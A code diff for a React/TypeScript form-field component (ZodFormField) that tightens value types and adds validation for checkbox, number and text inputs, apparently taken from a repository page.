const handleChange = (newValue: any) => {
|
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
|
||||||
onChange(fieldKey, newValue)
|
onChange(fieldKey, newValue)
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -29,7 +29,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
|
|||||||
<div className="flex items-center space-x-2">
|
<div className="flex items-center space-x-2">
|
||||||
<Checkbox
|
<Checkbox
|
||||||
id={fieldKey}
|
id={fieldKey}
|
||||||
checked={value || false}
|
checked={typeof value === 'boolean' ? value : false}
|
||||||
onCheckedChange={(checked) => handleChange(checked)}
|
onCheckedChange={(checked) => handleChange(checked)}
|
||||||
/>
|
/>
|
||||||
<Label htmlFor={fieldKey} className="text-sm font-normal">
|
<Label htmlFor={fieldKey} className="text-sm font-normal">
|
||||||
@@ -51,10 +51,14 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
|
|||||||
<Input
|
<Input
|
||||||
id={fieldKey}
|
id={fieldKey}
|
||||||
type="number"
|
type="number"
|
||||||
value={value || ''}
|
step="any" // This allows decimal numbers
|
||||||
|
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
|
||||||
onChange={(e) => {
|
onChange={(e) => {
|
||||||
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
|
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
|
||||||
handleChange(numValue)
|
// Only update if the parsed value is valid or the input is empty
|
||||||
|
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
|
||||||
|
handleChange(numValue)
|
||||||
|
}
|
||||||
}}
|
}}
|
||||||
placeholder={config.placeholder}
|
placeholder={config.placeholder}
|
||||||
/>
|
/>
|
||||||
@@ -101,7 +105,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
|
|||||||
<Input
|
<Input
|
||||||
id={fieldKey}
|
id={fieldKey}
|
||||||
type="text"
|
type="text"
|
||||||
value={value || ''}
|
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
|
||||||
onChange={(e) => handleChange(e.target.value || undefined)}
|
onChange={(e) => handleChange(e.target.value || undefined)}
|
||||||
placeholder={config.placeholder}
|
placeholder={config.placeholder}
|
||||||
/>
|
/>
|
||||||
|
|||||||
Reference in New Issue
Block a user